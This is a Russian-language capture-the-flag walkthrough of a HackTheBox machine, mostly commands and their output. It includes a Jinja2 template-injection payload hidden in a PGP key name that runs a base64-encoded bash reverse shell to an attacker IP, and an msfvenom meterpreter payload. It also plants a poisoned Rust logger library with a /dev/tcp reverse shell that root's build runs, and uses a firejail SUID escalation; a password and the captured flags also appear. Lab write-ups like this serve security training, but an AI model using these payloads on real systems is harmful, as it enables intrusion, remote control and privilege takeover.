Обзор сервисов
Проверим, что крутится на машине:
$ nmap -sV -sC -Pn -p1-65535 -vv -oN 10.10.11.218 10.10.11.218
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 13:57 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:57
Completed Parallel DNS resolution of 1 host. at 13:58, 6.01s elapsed
Initiating Connect Scan at 13:58
Scanning 10.10.11.218 [65535 ports]
Discovered open port 80/tcp on 10.10.11.218
Discovered open port 443/tcp on 10.10.11.218
Discovered open port 22/tcp on 10.10.11.218
Connect Scan Timing: About 31.94% done; ETC: 13:59 (0:01:06 remaining)
Increasing send delay for 10.10.11.218 from 0 to 5 due to max_successful_tryno increase to 4
Connect Scan Timing: About 42.57% done; ETC: 14:00 (0:01:22 remaining)
Connect Scan Timing: About 66.43% done; ETC: 14:01 (0:01:13 remaining)
Connect Scan Timing: About 75.77% done; ETC: 14:02 (0:00:58 remaining)
Increasing send delay for 10.10.11.218 from 5 to 10 due to max_successful_tryno increase to 5
Connect Scan Timing: About 85.02% done; ETC: 14:02 (0:00:42 remaining)
Completed Connect Scan at 14:03, 342.30s elapsed (65535 total ports)
Initiating Service scan at 14:03
Scanning 3 services on 10.10.11.218
Completed Service scan at 14:04, 12.35s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.11.218.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 2.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.45s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Nmap scan report for 10.10.11.218
Host is up, received user-set (0.052s latency).
Scanned at 2023-06-30 13:58:05 EDT for 358s
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET OPTIONS HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/organizationalUnitName=SSA/localityName=Classified/emailAddress=[email protected]
| Issuer: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/organizationalUnitName=SSA/localityName=Classified/emailAddress=[email protected]
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-04T18:03:25
| Not valid after: 2050-09-19T18:03:25
| MD5: b8b7:487e:f3e2:14a4:999e:f842:0141:59a1
| SHA-1: 80d9:2367:8d7b:43b2:526d:5d61:00bd:66e9:48dd:c223
| -----BEGIN CERTIFICATE-----
| MIIDpTCCAo0CFBEpfzxeoSRi0SkjUE4hvTDcELATMA0GCSqGSIb3DQEBCwUAMIGN
| MQswCQYDVQQGEwJTQTETMBEGA1UECAwKQ2xhc3NpZmllZDETMBEGA1UEBwwKQ2xh
| c3NpZmllZDEaMBgGA1UECgwRU2VjcmV0IFNweSBBZ2VuY3kxDDAKBgNVBAsMA1NT
| QTEMMAoGA1UEAwwDU1NBMRwwGgYJKoZIhvcNAQkBFg1hdGxhc0Bzc2EuaHRiMCAX
| DTIzMDUwNDE4MDMyNVoYDzIwNTAwOTE5MTgwMzI1WjCBjTELMAkGA1UEBhMCU0Ex
| EzARBgNVBAgMCkNsYXNzaWZpZWQxEzARBgNVBAcMCkNsYXNzaWZpZWQxGjAYBgNV
| BAoMEVNlY3JldCBTcHkgQWdlbmN5MQwwCgYDVQQLDANTU0ExDDAKBgNVBAMMA1NT
| QTEcMBoGCSqGSIb3DQEJARYNYXRsYXNAc3NhLmh0YjCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAKLTqQshN1xki+1sSRa6Yk5hlNYWroPyrVhm+FuKMpNL
| cjW9pyNOV/wvSdCRuk/s3hjqkIf12fljPi4y5IhqfcpTk+dESPGTiXdrE7oxcWHn
| jQvE01MaT9MxtIwGiRBupuFvb2vIC2SxKkKR28k/Y83AoJIX72lbeHJ9GlNlafNp
| OABrIijyFzBou6JFbLZkL6vvKLZdSjGy7z7NKLH3EHTBq6iSocSdxWPXtsR0ifeh
| hODGT2L7oe3OWRvClYTM3dxjIGC64MnP5KumamJoClL2+bSyiQzFJXbvcpGROgTU
| 01I6Qxcr1E5Z0KH8IbgbREmPJajIIWbsuI3qLbsKSFMCAwEAATANBgkqhkiG9w0B
| AQsFAAOCAQEAdI3dDCNz77/xf7aGG26x06slMCPqq/J0Gbhvy+YH4Gz9nIp0FFb/
| E8abhRkUIUr1i9eIL0gAubQdQ6ccGTTuqpwE+DwUh58C5/Tjbj/fSa0MJ3562uyb
| c0CElo94S8wRKW0Mds0bUFqF8+n2shuynReFfBhXKTb8/Ho/2T2fflK94JaqCbzM
| owSKHx8aMbUdNp9Fuld5+Fc88u10ZzIrRl9J5RAeR5ScxQ4RNGTdBVYClk214Pzl
| IiyRHacJOxJAUX6EgcMZnLBLgJ1R4u7ZvU3I3BiaENCxvV6ITi61IwusjVCazRf3
| NNn7kmk7cfgQqPCvmwtVrItRHxWEWnkNuQ==
|_-----END CERTIFICATE-----
|_http-title: Secret Spy Agency | Secret Security Service
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 364.46 seconds
Добавим в /etc/hosts наш хост:
10.10.11.218 ssa.htb
Вебка
Посмотрим, что есть на веб-сервере:
$ gobuster dir -u https://ssa.htb -w /usr/share/wordlists/dirb/common.txt -k -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://ssa.htb
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/30 14:07:05 Starting gobuster in directory enumeration mode
===============================================================
/about (Status: 200) [Size: 5584]
/admin (Status: 302) [Size: 227] [--> /login?next=%2Fadmin]
/contact (Status: 200) [Size: 3543]
/guide (Status: 200) [Size: 9043]
/login (Status: 200) [Size: 4392]
/logout (Status: 302) [Size: 229] [--> /login?next=%2Flogout]
/pgp (Status: 200) [Size: 3187]
/process (Status: 405) [Size: 153]
/view (Status: 302) [Size: 225] [--> /login?next=%2Fview]
Progress: 4535 / 4615 (98.27%)
===============================================================
2023/06/30 14:07:23 Finished
===============================================================
Заметим, что приложение работает на flask. Сервис позволяет проводить манипуляции с цифровыми подписями PGP. Проверим подпись:
Приметим пользователя atlas. Сгенерируем свой ключ:
$ gpg --full-generate-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
(14) Existing key from card
Your selection? 1
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (3072) 1024
Requested keysize is 1024 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y
GnuPG needs to construct a user ID to identify your key.
Real name: username
Email address:
Comment:
You selected this USER-ID:
"username"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: /home/kali/.gnupg/trustdb.gpg: trustdb created
gpg: directory '/home/kali/.gnupg/openpgp-revocs.d' created
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/355C7662B48FA8D21784839890AC132C18672DCF.rev'
public and secret key created and signed.
pub rsa1024 2023-06-30 [SC]
355C7662B48FA8D21784839890AC132C18672DCF
uid username
sub rsa1024 2023-06-30 [E]
$ gpg --output public.gpg --armor --export username
File 'public.gpg' exists. Overwrite? (y/N) y
┌──(kali㉿kali)-[~/htb/sandworm]
└─$ cat public.gpg
-----BEGIN PGP PUBLIC KEY BLOCK-----
mI0EZJ8cbgEEAL59H+jGbnZ7bTo+ez/zHfrA7UJgaEhM3CRKwYA3m5a4TI9ZT7Oj
ObKL5GLf861/7OLXd7y8QbjBtbeT68ZuA8ENrG6hXzat4lCPdccKAEUFRr/IWjZq
1752Ezr/sjCG7uNqyAj/a2cAg6lToaN1VBFqAg8XDF2h7UfVR6RWV4kDABEBAAG0
CHVzZXJuYW1liM4EEwEKADgWIQQ1XHZitI+o0heEg5iQrBMsGGctzwUCZJ8cbgIb
AwULCQgHAgYVCgkICwIEFgIDAQIeAQIXgAAKCRCQrBMsGGctz5YyBAC4Nm8/LC3z
lhMk7E+v1d5rvpin2XcsMCqNGb6t/wTiH768pZQ2fiqIPz6nCKb07x1TJmTFimr7
psjOCtqq2kdpDL7P4GqlZpIBZOVLWNmyn5MtJ4rYseILKglOtuIDGnRKNdiXWzKc
dL6HzPHnu8doncbmKdvv/ND8qRCqqlDwzbiNBGSfHG4BBADDgL7sFIzVEFEsozUK
PcwMVZakjkPcLEGZInCvmFOQSRnTH0kk5LLzwtikR6OlozG+UzoyTXrVws8W2iQO
RcGFrfEpKnUg1zfm7VvCd3bungtHPYRx52LEJ3e8CAhjW4JDB3ZXDpRVDqe0IUPk
kqCGLBCSpDGB1fJs/dcp1rzg3QARAQABiLYEGAEKACAWIQQ1XHZitI+o0heEg5iQ
rBMsGGctzwUCZJ8cbgIbDAAKCRCQrBMsGGctzzeLBACbzZQrCBKGX6kmJtTKRccm
RbysfNfUZ7wBSzB5W6wXQ/9gbqTFQ9PPRfOIOGEyinpTx4TAyYMUNCmRHUv9Sryl
qYgyPiAUlThQ4DTAdqurh/f9zCR1N4hpJtYCew9NjnB5QSwKUwmkNPg78U25Mhbx
7gLROKagOaBl4cxxdxCU1Q==
=tZNK
-----END PGP PUBLIC KEY BLOCK-----
Засунем в вебку и получим сообщение:
-----BEGIN PGP MESSAGE-----
hIwDAk7o6EWRNkkBBACxlyyLVIOX2Loj8ohdgQr86jXFTf6ZyLTxkVmy5DX52Eoe
lpjRTBdNw4YakQsIuobWsDdWHpmQ4BsvKj9C/nHc+pr6Zrho+CIRKFxCyIpKP7pq
FuBq8CHJT7jBcDQyhJuXfbQdQQuYgWRTbPK1U5SJp4uiQPUqLKBIJChUw875O9LA
agFcHaYrohQKTzPULD6fKvd6jiS0rBfTkA72NZCeD86we7b5VjP1dJ38NM2mlkya
om7ZNiK6Xk02wEfM/r5/lIxX8rdOBy6pZgYD84BkDKJkCvg9RFHt5TH2c6lu2nYm
HotnYryEWkCFFpMQHXeNGKdBrdIq1YcQx+RSOj7fE+xDqbbku//75zDOYxY2+7y6
MBuai1Ooo5N2htlEf//0kuXzpJfHOf7risS4Ptieb0nSHpaC3RoB/a+v0kghE29p
pSHN2AZyNqHG1yQVSmWW1fQ7nBXk3ZBPtsZn6FaGTYw9kqfDoaFKy0nkf6xEkjpz
RTuLT7ty2AqCJnQb7/qs5O+A0vhm5FGND7Jm833DBhbqEW5BZ2klTzw8fYoUO66U
eSbQFdq8fXU91A0=
=QXWP
-----END PGP MESSAGE-----
$ gpg --output message --decrypt message.enc
gpg: encrypted with 1024-bit RSA key, ID 024EE8E845913649, created 2023-06-30
"username"
┌──(kali㉿kali)-[~/htb/sandworm]
└─$ cat message
This is an encrypted message for username.
If you can read this, it means you successfully used your private PGP key to decrypt a message meant for you and only you.
Congratulations! Feel free to keep practicing, and make sure you also know how to encrypt, sign, and verify messages to make your repertoire complete.
SSA: 06/30/2023-18;20;30
Отметим, что username прокинулось внутрь сообщения, а значит, есть вероятность использовать Server Side Template Injection по гайду.
Поменяем имя на {{7*7}}.
Вставим новый публичный ключ и подписанный текст:
$ echo test | gpg --clear-sign
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
test
-----BEGIN PGP SIGNATURE-----
iLMEAQEKAB0WIQQ1XHZitI+o0heEg5iQrBMsGGctzwUCZJ8gnwAKCRCQrBMsGGct
z6pQA/0X2iQ57/1G6jMxcYcoha892+eGv7a/GOydGLuZE6nKSIeDYgHjQQ8OAY2i
6R6g1kdpzvbDUKh1yIox7uFJSKPG2Q72Qj2QKq2KPrXqHEkfvKMyCFE7QpCbIY6i
EQtm+1gqRr3B+SAa7raFaHStVMWc7oTAsdL0TeEJ1vkKh0/snA==
=9Q2h
-----END PGP SIGNATURE-----
На верификации срабатывает подсчет 7*7 = 49:
Определили по шаблонам, что в нашем случае используется шаблонизатор Jinja2. Генерация полезной нагрузки:
$ echo "/bin/bash -l > /dev/tcp/10.10.14.194/443 0<&1 2>&1" | base64 -w 0
L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjE
bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
Теперь используем это вместо имени:
$ gpg --edit-key {{7*7}}
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Secret key is available.
sec rsa1024/90AC132C18672DCF
created: 2023-06-30 expires: never usage: SC
trust: ultimate validity: ultimate
ssb rsa1024/024EE8E845913649
created: 2023-06-30 expires: never usage: E
[ultimate] (1). {{7*7}}
gpg> adduid
Real name: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
Email address:
Comment:
You selected this USER-ID:
"{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
sec rsa1024/90AC132C18672DCF
created: 2023-06-30 expires: never usage: SC
trust: ultimate validity: ultimate
ssb rsa1024/024EE8E845913649
created: 2023-06-30 expires: never usage: E
[ultimate] (1) {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
gpg> trust
sec rsa1024/90AC132C18672DCF
created: 2023-06-30 expires: never usage: SC
trust: ultimate validity: ultimate
ssb rsa1024/024EE8E845913649
created: 2023-06-30 expires: never usage: E
[ultimate] (1) {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
sec rsa1024/90AC132C18672DCF
created: 2023-06-30 expires: never usage: SC
trust: ultimate validity: ultimate
ssb rsa1024/024EE8E845913649
created: 2023-06-30 expires: never usage: E
[ultimate] (1) {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
gpg> uid 1
sec rsa1024/90AC132C18672DCF
created: 2023-06-30 expires: never usage: SC
trust: ultimate validity: ultimate
ssb rsa1024/024EE8E845913649
created: 2023-06-30 expires: never usage: E
[ultimate] (1)* {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
gpg> deluid
Really remove this user ID? (y/N) y
sec rsa1024/90AC132C18672DCF
created: 2023-06-30 expires: never usage: SC
trust: ultimate validity: ultimate
ssb rsa1024/024EE8E845913649
created: 2023-06-30 expires: never usage: E
[ unknown] (1). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
gpg> save
Meterpreter
Перейдем на meterpreter для удобства:
$ msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.194 LPORT=80 -f raw -o shell.py
$ cat shell.py | base64 -w 0
ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVQxRkxCQ0VRZmw1L2hXOHFtZXlHSFhXMFFVUVBFUkYwOXhZUnV6cVZyS3VpWG0xRi83MFRqMkNZNGZ2bW0yOW16Qng4ekRoNU5VSG0zOWFNZkJ3U3JDUlBPZTVVNXRuTWdGNTl4QXMyRHNmQnZRSHRXclpHVFk1Zis5eWt2ZzZMV3VnSlArRE53L1hkeTJiN2VITjF6NHBPS084Y3FFd3A2VnBSUW9ydVhCSisxcklpR0NNTUUycGdVUkJ5Y1M2clJiSUFnWjR5WlB0NmtkaTVNS2lKa3N0YndwT0lvRDZvWk95cGZVYTZQMkRMME9lN3NZQXRPS3JaaGQzYjZhUC83bkdsR1lJRkZDMVBDdzNLenlGQ1NyVCtMOGFWTEtTR291US9KSkYxK21Yb0R6RFpYb3M9JylbMF0pKSk=
cd /tmp
echo ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVQxRkxCQ0VRZmw1L2hXOHFtZXlHSFhXMFFVUVBFUkYwOXhZUnV6cVZyS3VpWG0xRi83MFRqMkNZNGZ2bW0yOW16Qng4ekRoNU5VSG0zOWFNZkJ3U3JDUlBPZTVVNXRuTWdGNTl4QXMyRHNmQnZRSHRXclpHVFk1Zis5eWt2ZzZMV3VnSlArRE53L1hkeTJiN2VITjF6NHBPS084Y3FFd3A2VnBSUW9ydVhCSisxcklpR0NNTUUycGdVUkJ5Y1M2clJiSUFnWjR5WlB0NmtkaTVNS2lKa3N0YndwT0lvRDZvWk95cGZVYTZQMkRMME9lN3NZQXRPS3JaaGQzYjZhUC83bkdsR1lJRkZDMVBDdzNLenlGQ1NyVCtMOGFWTEtTR291US9KSkYxK21Yb0R6RFpYb3M9JylbMF0pKSk= | base64 -d > shell.py
ls
shell.py
t
python3 shell.py
Firejail
Мы работаем в песочнице.
Креды пользователя
Поищем в домашней директории креды пользователя.
SSH
С кредами из предыдущего пункта можно подключиться по SSH:
$ ssh [email protected]
quietLiketheWind22
Пользовательский флаг
silentobserver@sandworm:~$ id
uid=1001(silentobserver) gid=1001(silentobserver) groups=1001(silentobserver)
silentobserver@sandworm:~$ ls -la
total 3084
drwxr-x--- 6 silentobserver silentobserver 4096 Jun 30 19:06 .
drwxr-xr-x 4 root root 4096 May 4 15:19 ..
lrwxrwxrwx 1 root root 9 Nov 22 2022 .bash_history -> /dev/null
-rw-r--r-- 1 silentobserver silentobserver 220 Nov 22 2022 .bash_logout
-rw-r--r-- 1 silentobserver silentobserver 3771 Nov 22 2022 .bashrc
drwx------ 2 silentobserver silentobserver 4096 May 4 15:26 .cache
drwxrwxr-x 3 silentobserver silentobserver 4096 May 4 16:59 .cargo
drwx------ 4 silentobserver silentobserver 4096 Jun 30 17:50 .gnupg
drwx------ 5 silentobserver silentobserver 4096 Jun 30 15:20 .local
-rw------- 1 silentobserver silentobserver 601 Jun 30 17:49 .mysql_history
-rw-r--r-- 1 silentobserver silentobserver 807 Nov 22 2022 .profile
-rwxrwxr-x 1 silentobserver silentobserver 3104768 Jun 30 01:18 pspy64
-rw------- 1 silentobserver silentobserver 7 Jun 30 19:06 .python_history
-rw-r----- 1 root silentobserver 33 Jun 30 15:14 user.txt
-rw------- 1 silentobserver silentobserver 3826 Jun 30 18:43 .viminfo
silentobserver@sandworm:~$ cat user.txt
af2c1d7646bfa86183e9dc105db44ccb
Повышение привилегий
Пользователь root компилирует с помощью cargo rust проект:
$ ps aux | grep cargo
root 468611 0.0 0.0 2888 1004 ? Ss 19:16 0:00 /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline
root 468613 0.0 0.1 11660 5796 ? S 19:16 0:00 /bin/sudo -u atlas /usr/bin/cargo run --offline
Код проекта:
silentobserver@sandworm:/opt/tipnet$ ls -la
total 116
drwxr-xr-x 5 root atlas 4096 Jun 6 11:49 .
drwxr-xr-x 4 root root 4096 Jun 30 19:16 ..
-rw-rw-r-- 1 atlas atlas 35548 Jun 30 19:16 access.log
-rw-r--r-- 1 root atlas 46161 May 4 16:38 Cargo.lock
-rw-r--r-- 1 root atlas 288 May 4 15:50 Cargo.toml
drwxr-xr-- 6 root atlas 4096 Jun 6 11:49 .git
-rwxr-xr-- 1 root atlas 8 Feb 8 09:10 .gitignore
drwxr-xr-x 2 root atlas 4096 Jun 6 11:49 src
drwxr-xr-x 3 root atlas 4096 Jun 6 11:49 target
Программа использует стороннюю библиотеку logger, которая подключается с локально:
silentobserver@sandworm:/opt/tipnet$ cat Cargo.toml
[package]
name = "tipnet"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
chrono = "0.4"
mysql = "23.0.1"
nix = "0.18.0"
logger = {path = "../crates/logger"}
sha2 = "0.9.0"
hex = "0.4.3"
Код использования библиотеки logger:
extern crate logger;
use sha2::{Digest, Sha256};
use chrono::prelude::*;
use mysql::*;
use mysql::prelude::*;
use std::fs;
use std::process::Command;
use std::io;
// We don't spy on you... much.
struct Entry {
timestamp: String,
target: String,
source: String,
data: String,
}
fn main() {
println!("
,,
MMP\"\"MM\"\"YMM db `7MN. `7MF' mm
P' MM `7 MMN. M MM
MM `7MM `7MMpdMAo. M YMb M .gP\"Ya mmMMmm
MM MM MM `Wb M `MN. M ,M' Yb MM
MM MM MM M8 M `MM.M 8M\"\"\"\"\"\" MM
MM MM MM ,AP M YMM YM. , MM
.JMML. .JMML. MMbmmd'.JML. YM `Mbmmd' `Mbmo
MM
.JMML.
");
...
Посмотрим на саму библиотеку:
silentobserver@sandworm:/opt/crates$ ls -la
total 12
drwxr-xr-x 3 root atlas 4096 May 4 17:26 .
drwxr-xr-x 4 root root 4096 Jun 30 19:20 ..
drwxr-xr-x 5 atlas silentobserver 4096 May 4 17:08 logger
Мы можем писать в этот файл! Запишем полезную нагрузку:
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;
pub fn log(user: &str, query: &str, justification: &str) {
let command = "bash -i >& /dev/tcp/10.10.14.194/443 0>&1";
let output = Command::new("bash")
.arg("-c")
.arg(command)
.output()
.expect("panic");
if output.status.success() {
let stdout = String::from_utf8_lossy(&output.stdout);
let stderr = String::from_utf8_lossy(&output.stderr);
println!("stout: {}", stdout);
println!("stderr: {}", stderr);
} else {
let stderr = String::from_utf8_lossy(&output.stderr);
eprintln!("stderr: {}", stderr);
}
let now = Local::now();
let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);
let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
Ok(file) => file,
Err(e) => {
println!("Error opening log file: {}", e);
return;
}
};
if let Err(e) = file.write_all(log_message.as_bytes()) {
println!("Error writing to log file: {}", e);
}
}
И запустим сборку:
cargo build
Ловим шелл:
Можно снова проделать путь для подключения meterpreter.
SUID
Ищем все бинарники с suid флагом:
$ find \-perm -4000 -user root 2>/dev/null
...
/usr/local/bin/firejail
...
$ ls -la /usr/local/bin/firejail
-rwsr-x--- 1 root jailer 1777952 Nov 29 2022 /usr/local/bin/firejail
Воспользуемся повышением привилегий по гайду:
$ chmod +x exploit.py
$ python3 exploit.py
# в другом окне
$ firejail --join=462481
Warning: cleaning all supplementary groups
Child process initialized in 19.90 ms
changing root to /proc/462481/root
$ su -
$ id
uid=0(root) gid=0(root) groups=0(root)
Флаг суперпользователя
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
Cleanup
domain.crt
domain.csr
domain.key
root.txt
cat root.txt
434a8221bf7500bb534886d28ce53e2d
